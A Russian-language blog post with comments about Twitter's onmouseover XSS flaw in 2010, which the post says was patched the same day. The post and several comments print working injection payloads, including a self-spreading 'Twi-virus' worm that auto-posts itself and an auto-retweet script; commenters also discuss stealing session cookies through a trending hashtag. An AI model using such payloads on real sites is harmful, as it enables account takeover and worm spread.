Активная XSS на Twitter

    Скриншот (спасибо lc0d3r):

    image
    Пример: twitter.com/mr_the/status/25105420721 (там только alert)

    Началось всё отсюда (банальное раскрашивание через css) twitter.com/RainbowTwtr, автор не известен.

    Достаточно отпостить твитт вида:
    http://twitter.com/mr_the#@"onmouseover="jAvascript:alert('Ha-ha! XSS!');"/
    
    и будет много-много радости.

    Собственно причина — плохой парсер ссылок, без должной фильтрации.

    В целях безопасности, рекомендую временно отключить выполнение JavaScript на twitter.com.

    UPD: В NewTwitter xss не работает.
    UPD2: На 15:52 (по Киеву) закрыли возможность отправлять подобные твитты. Старые всё ещё работают.
    UPD3: 16:46 по Киеву, уязвимость официально закрыли — status.twitter.com/post/1161435117/xss-attack-identified-and-patched
    Поделиться публикацией
    AdBlock похитил этот баннер, но баннеры не зубы — отрастут

    Подробнее
    Реклама
    Комментарии 105
    • +2
      Молодец!

      Фильтруйте все данные приходящие от пользователя!!!
      • +1
        В NewTwitter — работает все еще! При открытии нет, но когда идет обновление, через каждые n секунд выдается alert.
        • 0
          Мне вот такую штуку послали (пробел после http надо убрать):

          http ://t.co/@«onmouseover=»document.getElementById('status').value='RT MoiMrJack';$('.status-update-form').submit();«font-size:500pt;/
        • +1
          Это такой маркетинговый ход, чтобы все переходили на новую версию твиттера, так как там это не работает :)

          Кстати, так можно спастить от бага до офф. фикса
          • +3
            Проблема в том, что возможность перейти на новый твиттер есть далеко не у всех)
            • +1
              А у кого?
              • +2
                У избранных великим рандомом! Во всяком случае, в моей ленте новый твиттер может включить всего несколько человек, включая меня.
                • 0
                  А как ты его включаешь? Через настройки?
              • 0
                А как вообще узнать, есть у меня эта возможность, или нет?
                • +7
                  Сверху появится вот такая кнопочка:
                  • +1
                    Может, если подделать кнопочку у себя, она и у других включится?
                    • 0
                      Проверяли уже — не включается. По клику идёт вот такое обращение: twitter.com/account/use_phx?setting=true
                      Попробуйте, вдруг получится.
                      • 0
                        Все-таки нет. Ничего, скоро и на нашей улице будет праздник.
                        • 0
                          А у меня сработало и включилось. Спасибо!
                          Предложения как на скриншоте выше у меня не было.
                          • +2
                            Кстати, у меня это предложение блокировал один из плагинов)
                      • 0
                        Понятно, спасибо!
                • +7
                  хреноватенькие тестеры у них
                  • 0
                    Им походу нужно форсировать распространение новой версии. Если она так долго по серверам ползет, как долго будет распространяться фикс?
                  • +1
                    А ведь стоит написать короткий скрипт, и добавить к нему трендовый хештег — и можно насобирать кучу кукисов. Кукисы с твиттера чегонибудь дают?
                    • –1
                      сморя че в них хранится
                      • 0
                        Авторизация хранится. Можно зайти под чужим аккаунтом, подменив куки.
                      • +3
                        некоторые сайты используют для авторизации твиттеровский OAuth
                      • 0
                        Так, черт, я туплю :) Пытался дотянуться до крестика вкладки, проводя мышь напрямую, через ссылку, уберите это :)
                        • 0
                          Разноцветные твиты twitter.com/RainbowTwtr появились у меня на странице, сразу все одновременно, хотя я этого RainbowTwtr не фоловил. Через минуту они исчезли.
                          • +2
                            Значит кто-то из тех кого вы фолловите ретвитнул сообщения RainbowTwtr, а потом нажал Undo
                          • +3
                            twitter.com/biophreak у меня теперь настоящий коммунистический твиттер (:
                            • +1
                              А теперь то же самое с хеш-тегом, например #prinsjesdag
                              • 0
                                с хештегом не работает — постит текстом… либо у меня руки не оттуда :)
                                Можете попробовать, если че:
                                twitter.com/thenickname#@"style="background-color:red;color:red;position:fixed;left:0;top:0;width:100%;height:100%;z-index:9999999"/
                            • 0
                              Баги твиттера иногда задалбывают. Вроде кучу денег вложили в проект, почему так трудно довести его до ума?
                              • +12

                                Переходим на CSS3 ;-)
                                • +17
                                  Новый тренд. Самое впечатляющее JS-приложение в 140 символах.
                                  • +1
                                    меньше, там еще ссылка, собачка, решетка, и мелочи всякие (:
                                  • 0
                                    возвращаемся к временам ASM, приложение в минимальном количестве символов )
                                    • 0
                                      Я вижу используют эту xss. Давайте хоть тег писать #twitter_xss?
                                      • +2
                                        символов и так мало ))
                                      • 0
                                        Noscript как бе говорит «пофигу» ))
                                        • НЛО прилетело и опубликовало эту надпись здесь
                                          • +2
                                            всё, черви пошли. не ходите на вебморду
                                            • +6
                                              Twi-вирус:
                                              http: //a.no/@"onmouseover=";$('textarea:first').val
                                              (this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/
                                              • 0
                                                Аха, уже вся лента забита. Прикольно.
                                              • +1
                                                Мне пришел авторетвит: habreffect.ru/files/ba1/06e3909e1/rt.png
                                                Наводишь мышку и автоматом ретвитишь.
                                                • 0
                                                  А никто не пробовал еще размещать js на внешних ресурсах и подгружать их?
                                                • +1
                                                  Мужики, хорош херней страдать! Лента в твиттере уже совсем нечитаема
                                                  • 0
                                                    ну когда еще такое будет… ща наиграются все и надоест )
                                                    • +1
                                                      это же старая дырка… там клиент не фильтровался вроде.
                                                      • 0
                                                        Это старая уязвимость.
                                                      • НЛО прилетело и опубликовало эту надпись здесь
                                                        • –1
                                                          это не акк балуется, а твивирус распространется.
                                                          • НЛО прилетело и опубликовало эту надпись здесь
                                                        • –1
                                                          А какой командой удаляются аккаунты? :)
                                                          • 0
                                                            Сейчас лучше вообще не заходить на веб-морду, запросто вирусняк подцепишь.
                                                            • +1
                                                              Хватит во зло использовать, смотрите и радуйтесь: twitter.com/myfreeweb/statuses/25112218506
                                                            • +1
                                                              В ленте пипец просто настал.
                                                              Спас Firebug…
                                                              • –5
                                                                Я понимаю когда найденную довольно опасную уязвимость используют обычные пользователи. Но когда крупная компания, которая стремилась создать себе на Хабре «имя» тоже начинает грешить этим — это переходит все грани. И этой самой фирмой, как ни удивительно, снова оказалась Вконтакте. Вот скриншот:



                                                                А вот тут можно глянуть исходный код, дабы исключить фальсификации. И я даже догадываюсь кто это сделал.
                                                                • +6
                                                                  крупная компания грешит ламерством
                                                                  • –2
                                                                    Это весьма заметно. Сообщение больше 10 минут не удалялось, да и почти одновременно последовавший ретвит несколько другого сообщения от самого Цыплухина как бы намекает. Понабирали по объявлениям…
                                                                  • 0
                                                                    Дуров, кто-же еще =)
                                                                    • +9
                                                                      Забавно, даже когда пишут пост о критической уязвимости на сайте twitter.com, доблестные хабра-юзеры умудряются найти повод написать про то, какой нехороший сайт vkontakte.ru.
                                                                      • +3
                                                                        так это они зашли в свой твиттер через морду и словили хак, который отретвитился дальше, разве нет?
                                                                        • 0
                                                                          Хотите сказать, что Вконтакте преднамеренно это сделала?
                                                                          • –1
                                                                            За менее чем десять минут можно было сообщение удалить? Вроде как люди не совсем далекие от темы, должны были сообразить что это значит.
                                                                        • 0
                                                                          Попался два раза на авторетвите. Firebug помог.
                                                                          А вообще, mobile.twitter.com и никаких глюков в веб-морде :)
                                                                          • 0
                                                                            «В целях безопасности, рекомендую временно отключить выполнение Javascript на twitter.com.»
                                                                            Твиттер без скрипта не работает.
                                                                            • 0
                                                                              В целях безопасности сейчас лучше всего использовать внешние клиенты.
                                                                              • 0
                                                                                Вся лента теперь в этих отправлениях.
                                                                                • НЛО прилетело и опубликовало эту надпись здесь
                                                                                  • +5
                                                                                    новая твиттер версия упячка
                                                                                  • 0
                                                                                    Всё, уже вылечили.

                                                                                    Кто-нибудь может подсказать, как расшифровываются подобные строки? (переходить не рекомендую, возможно вирус):
                                                                                    http:\u002f\u002fis.gd\u002ffl9A7
                                                                                  • 0
                                                                                    <script language="javascript">
                                                                                    	document.write('http:\u002f\u002fis.gd\u002ffl5d3')
                                                                                    </script>
                                                                                    • +1
                                                                                      сорри, это был ответ на сообщение EvgeniyLazarev
                                                                                    • –4
                                                                                      уже достало говорить что пора юзать dabr.co.uk или sexymonday.ru/dabr
                                                                                    • +3
                                                                                      Новое приложение Твиттера «RainbowTwtr» по популярности затмило «Ферму». ВКонтакте — рыдает :)
                                                                                      • +1
                                                                                      • 0
                                                                                        Ну вот и пофиксили
                                                                                        • +5
                                                                                          Ждём, когда @KremlinRussia ретвитнет радугу :)
                                                                                        • НЛО прилетело и опубликовало эту надпись здесь
                                                                                          • +6
                                                                                            Почему до сих пор нет Властелина?
                                                                                            • 0
                                                                                              @ekozlov, @Unlevin, @alexa_cocacola — заставляют ретвить их посты скриптом всех кто за ними следует. Побанить бы их всех за такое… Бедный твиттер
                                                                                              • НЛО прилетело и опубликовало эту надпись здесь
                                                                                                • НЛО прилетело и опубликовало эту надпись здесь
                                                                                                  • 0
                                                                                                    Это не они, это скрипт сам рассылает эти твиты. Ретвитит сам себя и так распространяется.
                                                                                                  • +1
                                                                                                    Вообще-то уже браузер сам ретвитет кого угодно. Ахтунг. Закрываем твиттер и отдыхаем.
                                                                                                    • 0
                                                                                                      У меня тоже браузер сам сделал ретвит кода, ретвитов 100+. при этом home, странно себя ведет, делает редирект на direct messages.
                                                                                                      • 0
                                                                                                        Вот, это и я зацепил.
                                                                                                    • +1
                                                                                                      Я просто оставлю это здесь:
                                                                                                      mobile.twitter.com/
                                                                                                      • НЛО прилетело и опубликовало эту надпись здесь
                                                                                                      • +1
                                                                                                        Я горжусь, что меня фолловит @mr_the :D
                                                                                                        • +2
                                                                                                          Пофиксили. Расходимся (:
                                                                                                          • –7
                                                                                                            кому это интересно? Твиттеры вместе с вконтактами пора поставить на пыльную полочку и забыть о них.
                                                                                                            • +1
                                                                                                              А у меня после всех этих забав, главная твиттера выглядит вот так,

                                                                                                              Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.